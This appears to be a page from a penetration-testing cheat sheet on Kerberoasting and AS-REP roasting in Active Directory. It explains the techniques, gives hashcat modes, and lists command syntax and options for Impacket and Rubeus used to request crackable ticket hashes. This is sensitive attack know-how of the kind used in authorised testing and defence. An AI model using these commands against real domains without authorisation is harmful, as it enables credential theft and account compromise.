Roasting

Kerberoasting

In Active Directory, Service Tickets can be requested by any authenticated domain user for any domain account tied to a service using a Service Principal Name (SPN).

Service Tickets are partially encrypted with the Kerberos key (derived from the account password) of the account tied to the service. Thus, you can try to crack the service account password by trying to decrypt the ST.

The hashcat mode for the default RC4 encrypted TGS-REP ticket is 13100

GitHub - fortra/impacket: Impacket is a collection of Python classes for working with network protocols.GitHub

Linux (Attacker)

getUserSPNs.py [domain/username]<:password> <options>

OPTIONS
-hashes [LMHASH:NTHASH]            NTLM Hashes, Format is LMHASH:NTHASH
-dc-ip [IP]                        IP Address Of The Domain Controller
-outputfile [file]                 Output Filename
-request                           Requests TGS For Users
-format                            Hashcat | John

GitHub - GhostPack/Rubeus: Trying to tame the three-headed dog.GitHub

Windows

Rubeus.exe kerberoast <options>

OPTIONS
/spn:                    Kerberoast Only A Specific SPN
/user:                   Kerberoast Only A Specific User
/outfile:                Writes Kerberoasted Hashes To A File
/nowrap                  Don't Wrap Kerberoast Results (Easier For Copy Paste)
/tgtdeleg                Request RC4 Tickets From Accounts With AES Enabled 
/rc4opsec                Only Kerberoast Accounts Without AES Enabled

ASREP-Roasting

In Kerberos Authentication, users typically need to perform Kerberos Pre-Authentication by sending a timestamp encrypted with the user's Kerberos key (derived from the account password) to the KDC.

If Kerberos Pre-Authentication is disabled for an account by setting the DONT_REQUIRE_PREAUTH flag, an attacker can impersonate the account by requesting a TGT from the KDC as the account. The KDC's AS-REP response will include a session key encrypted with the account's Kerberos key. This session key can then be cracked to obtain the account's password.

The hashcat mode for the AS-REP ticket is 18200

GitHub - fortra/impacket: Impacket is a collection of Python classes for working with network protocols.GitHub

Linux

GetNPUsers.py [domain/username]<:password> <options>

OPTIONS
-hashes [LMHASH:NTHASH]            NTLM Hashes, Format is LMHASH:NTHASH
-dc-ip [ip]                        IP Address Of The Domain Controller
-outputfile [file]                 Output Filename
-request                           Requests AS-REP For Users
-format                            Hashcat | John

GitHub - GhostPack/Rubeus: Trying to tame the three-headed dog.GitHub

Windows

Rubeus.exe asreproast <options>

OPTIONS
/user:                   ASREP-Roast Only A Specific User
/format:                 Output ASREP-Roast Format (Default: John The Ripper)
/outfile:                Writes Kerberoasted Hashes To A File
/nowrap                  Don't Wrap ASREP-Roast Results (Easier For Copy Paste)

PreviousKerberos NextSilver Tickets

Last updated 1 year ago